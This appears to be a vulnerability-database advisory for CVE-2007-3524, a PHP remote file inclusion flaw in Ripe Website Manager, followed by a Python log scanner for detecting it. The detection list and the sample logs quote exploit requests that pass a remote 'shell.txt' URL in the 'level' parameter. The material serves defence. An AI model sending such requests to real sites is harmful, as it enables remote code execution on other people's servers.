CVE-2007-3524
published 2007-07-03

Priority: P3 (51)
Severity: medium, 6.8 (CVSS 2.0)
Vector: AV:N/AC:M/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 64.20% (99.1th percentile)

Multiple PHP remote file inclusion vulnerabilities in Ripe Website Manager 0.8.9 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the level parameter to (1) admin/includes/author_panel_header.php or (2) admin/includes/admin_header.php.

Affected

1 range

| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| ripe_website_manager | ripe_website_manager | <= 0.8.9 | |

Detection & IOCs (extracted from sources)

  • path: `/admin/includes/author_panel_header.php`
  • path: `/admin/includes/admin_header.php`
  • url: `http://www.site.com/[path to ripe]/admin/includes/author_panel_header.php?level=shell.txt?`
  • url: `http://www.site.com/[path to ripe]/admin/includes/admin_header.php?level=shell.txt?`
  • Monitor HTTP requests targeting the `level` parameter in the two vulnerable PHP scripts for values containing a URL (remote file inclusion pattern), particularly those ending with `?` to nullify the appended extension.
  • The RFI payload appends a trailing `?` to the injected URL (e.g., `level=shell.txt?`) to neutralise any suffix appended by the include statement — look for this pattern in web server logs.
  • The vulnerability affects Ripe Website Manager version 0.8.9 and earlier only; verify the installed version before applying detection rules to avoid false positives on patched installations.
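
The two log checks described above, as an added example that is not part of the original advisory or of any vendor rule set. It assumes Common/Combined Log Format access logs; the function names, hosts and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote

# Script paths named in the advisory for CVE-2007-3524.
VULN_SCRIPTS = ("/admin/includes/author_panel_header.php",
                "/admin/includes/admin_header.php")
# Request line of a Common/Combined Log Format entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# scheme:// at the start of the value, i.e. a URL supplied as `level`.
URL_VALUE_RE = re.compile(r"^[a-z][a-z0-9+.-]*://", re.I)

# Constructed sample lines (documentation IPs and example hosts).
SAMPLE_LOG = [
    '192.0.2.10 - - [03/Jul/2007:10:00:01 +0000] "GET /ripe/index.php HTTP/1.1" 200 5120',
    '198.51.100.7 - - [03/Jul/2007:10:00:05 +0000] "GET /ripe/admin/includes/'
    'author_panel_header.php?level=http://files.example.net/shell.txt? HTTP/1.1" 200 312',
    '198.51.100.7 - - [03/Jul/2007:10:00:09 +0000] "GET /ripe/admin/includes/'
    'admin_header.php?level=shell.txt%3F HTTP/1.1" 200 298',
    '192.0.2.10 - - [03/Jul/2007:10:01:00 +0000] "GET /ripe/admin/includes/'
    'admin_header.php?level=2 HTTP/1.1" 200 4410',
]

def level_value(query):
    """Return the decoded `level` value, keeping any '?' the client put in it."""
    for pair in query.split("&"):
        name, _, value = pair.partition("=")
        if unquote(name) == "level":
            return unquote(value)
    return None

def classify(line):
    """Return the reasons a log line matches the advisory's detection notes."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    target = urlsplit(m.group(1))  # splits at the first '?' only
    if not target.path.lower().endswith(VULN_SCRIPTS):
        return []
    value = level_value(target.query)
    if value is None:
        return []
    reasons = []
    if URL_VALUE_RE.match(value):
        reasons.append("url-in-level")
    if value.endswith("?"):  # covers both raw '?' and encoded %3F
        reasons.append("trailing-question-mark")
    return reasons

def scan(lines):
    """Return (line_number, reasons) for every flagged line."""
    return [(n, r) for n, r in ((i, classify(l)) for i, l in enumerate(lines, 1)) if r]

if __name__ == "__main__":
    for lineno, reasons in scan(SAMPLE_LOG):
        print(lineno, ",".join(reasons))
```

Matching is on the decoded value, so a percent-encoded `?` or scheme is flagged the same way as the raw form.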